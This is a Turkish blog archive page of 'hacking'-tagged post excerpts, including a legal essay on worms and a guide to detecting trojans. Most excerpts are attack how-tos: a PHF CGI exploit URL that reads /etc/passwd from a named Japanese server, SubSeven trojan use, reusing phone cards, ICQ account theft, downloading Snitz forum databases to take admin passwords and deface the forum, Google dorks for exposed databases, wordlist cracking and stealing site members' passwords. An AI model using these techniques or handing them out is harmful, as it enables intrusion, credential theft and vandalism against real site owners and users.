hacking etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
hacking etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

2 Ağustos 2011 Salı

Sitelerin CGI/BIN Açıklarını Bulmak

a- (Phf scripti): 

Pek çok web ana bilgisayarı CGI-BIN güvenliğinden yoksundur. Bir de bunun üzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel sistem açıklarına yol açmaktadır. Tüm dünyada pek çok hacker'in kullandığı cgi-bin güvenlik açığı:

SubSeven Kullanımı

Bu bölümde subseven trojanının kullanımını ayrıntılı bir şekilde anlatacağım. Öğrendiğiniz bu bilgileri kesinlikle kötü amaçlar için ve başkalarının bilgisayar larına zarar vermek için kullanmayın. Çünkü bunu yapmakla elinize hiçbir şey geçmez. Aksine başınız çok büyük belaya bile girebilir. İlk önce Subseven ın son sürümü olan defcon8 editionı download etmelisiniz

TELEKOMUN TELEFON KARTLARIYLA DİLEDİĞİNİZ KADAR KONUŞUN!!!!

Eh telekom zam yaptıkça ünü bu gibi konularda ayyuka çıkmış Türk milleti de durmadı ve tabiiki de bu işi bedava ve kolayca halletmenin yolunu buldu. Bu yazıda anlatılanlar sadece ve sadece bilgi amaçlı olup aslında telefon kartlarının tekrar kullanılma yollarını değil Türk milletinin ne kadar akıllı olduğunu göstermek amacıyla yazılmıştır.

Telekom Hack

BU YAZI BİLGİ EDİNMENİZ İÇİN YAYINLANMIŞTIR.UYGULANMASI SUÇ TEŞKİL EDEBİLİR.

TELEFONLARI BELE$ KULLANMAK!Evet sevgili arkadaslar. Sonunda telefon kartim bitti diye uzulmiyeceksiniz. Elinizde bulunan tek konturluk kartla bile sabaha kadar konusmak mumkun :)

Bunu yapmak icin neler gerekli:

UIN HACK & SECURITY 2

Selamlar. Önceki yazımda başladığım uin hack ve security konusuna göstermiş olduğunuz ilgiden dolayı çok teşekkürler. Benden uin isteyen arkadaşlara elimden gelen yardımı yapmaya çalıştım. Ancak hiç kimseye hiçbir şey karşılığında (para da dahil) uin veremeyeceğimi bir kez daha belirtmek istiyorum.
Yazımın ilk bölümünde uin güvenlik açıklarının üç temel boyutunun iki tanesinden söz etmiştim. Bunlardan ilki dikkatsiz ve özensiz şifre seçimiydi. Diğer güvenlik açığı ise Primary e-mail kısmına yazılan e-mail adresinin Mirabilis tarafından kayıp şifrelerin gönderildiği adres olarak kullanılmasından kaynaklanıyordu. Şimdi e-mail açıkları ile ilgili birkaç konuya daha değinerek bu boyutu da tamamlayacağız.

WEB HACK NEDIR???


WEB hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek gerekirse:
http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Satirini browserinize yazip enter e basin bu satir passwd dosyasini acmaya calisacaktir(adresi attim)
Error 404
/cgi-bin/phf is not found on this server
Bu satirlar karsiniza cikarsa bilinki server yeni ve size gecit vermiyor
Ama asagidaki listeyi verirse bilinki buldunuz:)))
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh

Web Hack Yöntemleri

1-Bu olayı herkez yapabilir çok basit bir yöntem, bu yöntemle geçen haftalarda 400 e yakın üyesi olan bir forum u hackledim. En çok kullanılan 2 forum türü vardır biri Snitz diğeri ise Web Wiz Guide forum larıdır. color=#800080 www.google.com <http://www.google.com> dan bu isimleri aratıyorsunuz orda size yüzlerce forum çıkar (Web Wiz forum olarak aratın) örneğin color=#0000ff www.ahmetyigit.com/forum <http://www.ahmetyigit.com/forum> adresinin google dan buldunuz ve siteye girdiniz eğer Snitz forum ise sonuna şunları ekleyin /snitz_forums_2000.mdb <eğer adam mdb dosyasının yerini değiştirmeden sitesine attıysa bütün kullanıcı isimleri ve şifrelerini görebilirsiniz>daha sonra karşınıza bu dosyayı yüklemek istiyormusunuz diye bişey gelicek kaydet diyin ye dosyayı yükleyin. Daha sonra bilgisayarınızda Microsoft Access varsa bu dosyayı açıp o forum un bütün şifrelerinin ele geçirebilirsiniz. Geçirdiğiniz şifreler arasında admin şifreside bulunmaktadır bu sayede forum un ortasına hacked by .... yaza bilirsiniz. Yanlız bu olay bütün forumlarda olmamaktadır.

Web Hack

Web sitelerinin Türü Çok ÖnemlidiR Hackleyeceksiniz Fakat Site Ne Tür Örneğin (Asp ? Php ? Html ? Flash ? cgi ? Vs . vs.) Hackleyeceğiniz Sitenin Kaynağını ßilmek Çok önemlidir

*Zekanız
Peki baska sekilde yapamazmiyiz bu da sizin hayal gücünüze bali
inurl:admin filetype:mdb
inurl:userpass filetype:mdb
inurl:data filetype:mdb
inurl:ftp filetype:txt

2.List Path ile database Bulma Yöntemi

Gerekli olan yani sunucunun sagladigi hostan bir yer edinirsiniz Bunu para ile
Veya kendinizde atabilirsiniz )


inurl:upload filetype:asp
veya
inurl:aspupload filetype:asp
inurl:fileload filetype:asp
Bunlar bana zehiri yedirebilecem yerleri göstereck ammada cok site var demi )

Web Hack Nedir?

WEB HACK UZERINE
WEB HACK NEDIR???
  WEB hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek gerekirse:

Web Site Hacking

 Selamlar... Bu yazida daha basit ama daha hizli bir hack yontemini anlatcam
Bu yontem cok hosunuza gidecek :) Gerekli Programlar : Internet Explorer
haricinde bir web browser, Cracker Jack ve tabiki Meliksah Ozoral's Dict Maker.
--------------------------------------
Mantik : phf sistemlerde bulunan bir acikdir ve bu acik sayesinde sisteme
web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
--------------------------------------

Wingate ile IP spoofing.

Esasinda wingate 1 den fazla bilgisayarin bir internet baglantisini
kullanmasini saglamak icin kullanilir.Ornek:internet cafeler.
Biz winGate in telnet cikisini kullanacagiz.(port 23)Bir wingate server da
yani wingate
yuklu ve calismakta olan makinada 23. port a telnet cektiginizde su cevabi alirsiniz.


Word List Nedir?

WoRD_lisT Ftp ve acc gi şifreleri ele geçirmek için kullanılan, genelde text dosyaları olan adında anlaşılacağı gibi kelime listeleridir.
Bunları kullanmak için mutlaka bir Wordlist progamına ihtiyacınız vardır..
Aynı Zamanda. Programa Wordlist dosyaları verilerek şifre kırma işlemine başlanmış olur.
Çalışma algoritmasına gelince Wordlistinizdeki şifreleri we karakreleri..Müdahele yaptığınız dosya veya ftp üzerinde tek tek dener..

Word List Hazırlama

  Selamlar. Bu bölümde de word listler yani cracker programlarının kullandığı sözlükleri inceliyeceğiz. Word List cracker programlarının şifreleri kırmak için kullandığı alt alta yazılmış harf yada rakamlardan oluşan dosyalardır. Genelde aşırı büyük olurlar. 8 karakterlik bir wordlist 1.5 GB kadar yer kaplamaktadır. Bu dosyada şifre kombinasyonları yer alır. Jhon veya jackte bu kombinasyonları deneyerek kırma işlemini gerçekleştirir.


    Bu dosyaları hazırlamak için Meliksah arkadaşımızın yazdığı sibop kullanabilriz. Bu programı kullanmak oldukça kolay. Ama ben burada Dictionary Maker adlı programda bahsedeceğim.

KURTLAR VE ZOMBİLER

Worm’ların ve DDoS Ataklarının Hukuki İncelemesi
Copyright, Av.Ali Osman Özdilek, Montreal, Ocak 2003

24 Ocak Cuma günü her akşam olduğu gibi İnternet’e girdiğimde browserım bir türlü sayfaları açamadı. Oysa kullandığım ISS nin bağlantılarında hiç yavaşlama olmazdı. Bir terslik olduğunu anladım ve düzenli olarak ziyaret ettiğim güvenlik sitelerinden birine zor da olsa ulaşmayı başardım ve bu yavaşlamanın sebebini öğrendim.
ın Ulusal Altyapı Sistemi Koruma Merkezi ( FBI’s National Infrastructure Protection Center ) web sitesinde ( www.nipc.gov ) benzer bir uyarı yayınladı. Bu uyarıda ayrıca NIPC tarafından geliştirilen, sistem yöneticilerinin Trinoo ve TFN’yi inceleyebilmeleri amacıyla kullanabilecekleri ücretsiz bir yazılım da yer alıyordu.

XXX Site Pass Cracking

Bir siteye üye olan kullanıcıların şifresini çalmak için öncelikle o sitede minik bir araştırma yapmamız gerekir. İlk olarak üyelerin kullanıcı adlarını ve şifrelerini girdikleri yerin adresini bulacağız. Üye şifresini çalmak istediğiniz siteye girin. Orada "Üye Girişi" yada "Members" diye bir bölüm olması lazım. Ona tıklayın, büyük ihtimalle şifrenizi soran bir ekranla karşılaşacaksınız. O ekranın çıktığı adresi bir yere not edin. Adresin şöyle bir şey olması lazım:

Bilgisayarınıza Hacker'lar Mı Dadandı?

Son zamanlarda, IRC üzerinden karşı tarafın PC'sine bir trojan yollayarak portlarından birinde açık sağlamak ve bu portu kullanan bir program vasıtasıyla PC'ye tamamen hükmetmek tehlikeli derecede yaygın bir hal aldı. Siz IRC'de keyifle sohbet ederken bir hacker, (biz bunlara lammer diyoz..) haberiniz bile olmadan bilgisayarınızda geziniyor veya bazı şahsi bilgilerinizi çalıyor olabilir.

Bu yazımda  hack edildiğinizi anlamanın yollarından ve anlayınca bunun önüne nasıl geçebileceğinizden bahsedeceğim.